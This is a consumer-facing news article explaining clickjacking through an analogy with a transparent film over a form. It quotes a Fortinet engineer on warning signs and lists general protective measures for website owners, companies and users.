Clickjacking attacks: How innocent clicks compromise your privacy
Among the techniques used by cybercriminals is clickjacking. In this case, scammers use secure websites for their activities.
26 July 2024 20:18
Innocently clicking "Like" or subscribing to a newsletter on a website can result in installing harmful software and activating code that allows hackers to access passwords or monitor keystrokes. The technique known as clickjacking involves cybercriminals exploiting secure websites to carry out attacks.
What is clickjacking and what makes it powerful?
Imagine a situation where you're asked to fill out a paper form with your data, such as your username, password, and other confidential information. Unfortunately, someone has placed a transparent film over the form. An unsuspecting person writes their data on the film, thinking they are writing on the form, while the original form remains empty. The film with the data ends up in the hands of scammers, while the empty form goes to the recipient, who is unaware of the deception.
A similar mechanism is used in clickjacking attacks, where cybercriminals overlay a malicious, invisible layer on legitimate and trusted websites. Users clicking on what appears to be safe, like links or forms, may unknowingly be handing their data over to scammers.
Cybercriminals using the clickjacking technique have several options for action. The most basic method, placing a transparent layer over the entire website, is relatively simple to implement. However, it is also easier to detect by advanced protection systems like EDR (Endpoint Detection and Response), which are designed to identify such threats.
Therefore, other tricks are employed, such as hiding different objects on the official site or introducing new ones. These could be posts deceptively similar to those found on social media. Clicking the "Like" button can trigger an unwanted action, like downloading malicious code or turning on a webcam. In other cases, these are fake login forms, and the sensitive data entered into them goes straight to the cybercriminals' database and can be used or resold further.
Such attacks are complex and difficult to identify. Particularly concerning is the fact that the ability to detect such activities from the perspective of the average internet user is limited (although there are some preventive measures), and implementing proper website protections usually requires the help of specialists.
“Due to the hidden nature of these activities, victims cannot see the danger. However, certain symptoms can raise suspicions in an aware internet user. For example, if, after clicking a consent window for data processing, there is a noticeable, quick content change or the site does not respond to clicks, this could indicate an attempt at fraud. Suppose a red warning light goes off in the user's head in such or a similar situation. In that case, it's worth reporting this to the website administrator, who can take appropriate actions to verify the case and possibly restore the site's security,” advises Robert Dąbrowski, head of the engineering team at Fortinet's Polish branch.
How to protect against danger?
The responsibility for protecting against clickjacking attacks primarily lies with website owners. The most effective defensive measures can be implemented by developer teams who install appropriate protective mechanisms on servers. These mechanisms control the content displayed on the pages and block the presentation of potentially dangerous content in the browser.
Companies can also take additional steps to protect their employees and customers. Educating the staff is crucial; employees should be aware that they can react more quickly to threats and notify the appropriate specialists. Another important measure is installing a next-generation firewall (NGFW) with an application firewall function. Such a firewall protects against typical network threats and is capable of recognizing and blocking emerging threats, including clickjacking.
On users' computers, there should always be up-to-date protective software with a function for scanning opened websites. It is also essential to remember the systematic updating of the operating system and web browsers. Certain methods of clickjacking previously used by cybercriminals have been blocked thanks to appropriate software protections.
Due to the continuous evolution of data presentation methods on the global network, cyberattacks similar to clickjacking will continue to be carried out. Victims will be enticed into performing unexpected actions on websites that look identical to those they've previously used. Therefore, efforts to educate for awareness that leads to thwarting cyberattacks through quick reporting of suspicious situations to administrators should not cease. But simultaneously, it is necessary to implement appropriate technical solutions that minimize the level of threat.